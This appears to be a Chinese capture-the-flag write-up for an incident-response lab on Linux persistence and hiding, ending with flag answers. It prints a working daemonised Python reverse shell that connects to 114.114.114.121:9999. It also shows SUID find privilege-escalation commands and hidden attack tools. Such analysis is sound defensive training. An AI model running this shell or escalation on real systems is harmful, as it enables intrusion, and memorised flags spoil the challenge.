玄机应急响应第三章

linux权限维持-隐藏

1.黑客隐藏的隐藏的文件 完整路径md5

在/tmp有一个.temp,发现是libprocesshider，是用于隐藏文件的工具

https://github.com/gianlucaborello/libprocesshider

root@xuanji:/tmp/.temp/libprocesshider# cat processhider.c 
#define _GNU_SOURCE

#include <stdio.h>
#include <dlfcn.h>
#include <dirent.h>
#include <string.h>
#include <unistd.h>

/*
 * Every process with this name will be excluded
 */
static const char* process_to_filter = "1.py";

隐藏的文件是1.py

/tmp/.temp/libprocesshider/1.py

flag{109ccb5768c70638e24fb46ee7957e37}

2.黑客隐藏的文件反弹shell的ip+端口 {ip:port}

root@xuanji:/tmp/.temp/libprocesshider# cat 1.py 
#!/usr/bin/python3

import socket,subprocess,os,sys, time

pidrg = os.fork()
if pidrg > 0:
        sys.exit(0)

os.chdir("/")
os.setsid()
os.umask(0)
drgpid = os.fork()
if drgpid > 0:
        sys.exit(0)

while 1:
        try:
                sys.stdout.flush()
                sys.stderr.flush()
                fdreg = open("/dev/null", "w")
                sys.stdout = fdreg
                sys.stderr = fdreg
                sdregs=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
                sdregs.connect(("114.114.114.121",9999))
                os.dup2(sdregs.fileno(),0)
                os.dup2(sdregs.fileno(),1)
                os.dup2(sdregs.fileno(),2)
                p=subprocess.call(["/bin/bash","-i"])
                sdregs.close()
        except Exception:
                pass
        time.sleep(2)

flag{114.114.114.121:9999}

3.黑客提权所用的命令 完整路径的md5 flag{md5}

上传linpeas扫描

-rwsr-xr-x. 1 root root 93K Nov 23  2016 /bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x. 1 root root 44K May  7  2014 /bin/ping
-rwsr-xr-x. 1 root root 44K May  7  2014 /bin/ping6
-rwsr-xr-x. 1 root root 37K May 16  2017 /bin/su
-rwsr-xr-x. 1 root root 68K Nov 23  2016 /bin/umount  --->  BSD/Linux(08-1996)
-rwsr-xr-x. 1 root root 46K May 16  2017 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x. 1 root root 41K May 16  2017 /usr/bin/chsh
-rwsr-xr-x. 1 root root 225K Jan  6  2014 /usr/bin/find
-rwsr-xr-x. 1 root root 71K May 16  2017 /usr/bin/gpasswd
-rwsr-xr-x. 1 root root 36K May 16  2017 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x. 1 root root 46K May 16  2017 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x. 1 root root 152K May 29  2017 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x. 1 root root 10K Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x. 1 root root 431K Mar  4  2019 /usr/lib/openssh/ssh-keysign

可以通过/usr/bin/find命令的SUID位进行提权

sudo install -m =xs $(which find) .

./find . -exec /bin/sh -p \; -quit

flag{7fd5884f493f4aaf96abee286ee04120}

4.黑客尝试注入恶意代码的工具完整路径md5

在/opt还有一个隐藏目录.cymothoa-1-beta

Cymothoa 是一款可以将 shellcode 注入到现有进程的（即插进程）后门工具。借助这种注入手段，它能够把shellcode伪装成常规程序

/opt/.cymothoa-1-beta/cymothoa

flag{087c267368ece4fcf422ff733b51aed9}

5.使用命令运行 ./x.xx 执行该文件 将查询的 Exec****** 值 作为flag提交 flag{/xxx/xxx/xxx}

这里的文件指的是之前的1.py

python3 /tmp/.temp/libprocesshider/1.py

ls -la /usr/bin/python3

发现是软链接到python3.4

flag{/usr/bin/python3.4}